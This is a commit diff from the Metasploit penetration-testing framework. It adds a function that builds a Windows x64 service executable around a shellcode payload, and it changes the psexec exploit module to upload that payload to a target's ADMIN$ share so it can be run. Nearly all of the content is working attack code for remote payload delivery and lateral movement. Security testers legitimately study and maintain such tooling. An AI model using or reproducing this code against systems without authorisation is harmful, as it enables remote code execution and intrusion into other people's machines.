allow x64 payloads to be used with psexec

git-svn-id: file:///home/svn/framework3/trunk@9565 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-21 03:49:39 +00:00
parent 33086db682
commit 2c91164494
2 changed files with 26 additions and 2 deletions

View File

@ -351,6 +351,26 @@ require 'metasm'
return pe return pe
end end
def self.to_win64pe_service(framework, code, name='SERVICENAME')
pe = ''
fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "service_x64.exe"), "rb")
pe = fd.read(fd.stat.size)
fd.close
bo = pe.index('PAYLOAD:')
raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
pe[bo, 8192] = [code].pack("a8192")
bo = pe.index('SERVICENAME')
raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
pe[bo, 11] = [name].pack('a11')
pe[136, 4] = [rand(0x100000000)].pack('V')
return pe
end
def self.to_win32pe_dll(framework, code) def self.to_win32pe_dll(framework, code)
pe = '' pe = ''

View File

@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Author' => 'Author' =>
[ [
'hdm' 'hdm',
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',
@ -127,7 +127,11 @@ class Metasploit3 < Msf::Exploit::Remote
filename = rand_text_alpha(8) + ".exe" filename = rand_text_alpha(8) + ".exe"
simple.connect("ADMIN$") simple.connect("ADMIN$")
fd = simple.open("\\#{filename}", 'rwct') fd = simple.open("\\#{filename}", 'rwct')
fd << Msf::Util::EXE.to_win32pe_service(framework,payload.encoded,rand_text_alpha(8)) if (datastore['PAYLOAD'].include? 'x64')
fd << Msf::Util::EXE.to_win64pe_service(framework,payload.encoded,rand_text_alpha(8))
else
fd << Msf::Util::EXE.to_win32pe_service(framework,payload.encoded,rand_text_alpha(8))
end
fd.close fd.close
print_status("Created \\#{filename}...") print_status("Created \\#{filename}...")